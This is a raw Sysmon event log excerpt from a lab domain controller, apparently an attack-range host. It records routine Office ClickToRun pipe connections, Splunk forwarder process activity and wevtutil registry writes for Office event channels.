18141800x800000000000000077095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.061{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBF9-607E-F40D-00000000BB01}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000077063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.045{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A77CB2DC5124A9F0020AB3B5C3676289,SHA256=FBE336BEB58864913C2452099D96F5EF5C8CD6AF06DC379DADA0E29842633E17,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000077062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:02.045{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeDebugChannel\TypeDWORD (0x00000003) 13241300x800000000000000077061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:02.045{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeDebugChannel\IsolationDWORD (0x00000000) 13241300x800000000000000077060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:02.045{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeDebugChannel\OwningPublisher{8736922d-e8b2-47eb-8564-23e77e728cf3} 13241300x800000000000000077059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:02.045{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeChannel\TypeDWORD (0x00000002) 13241300x800000000000000077058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:02.045{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeChannel\IsolationDWORD (0x00000000) 13241300x800000000000000077057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:02.045{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeChannel\OwningPublisher{8736922d-e8b2-47eb-8564-23e77e728cf3} 10341000x800000000000000077056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.045{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.045{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.045{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.045{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.045{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-F40D-00000000BB01}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.045{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBF9-607E-F40D-00000000BB01}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000077050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.905{A7A01FEF-EBF9-607E-F40D-00000000BB01}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000077049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 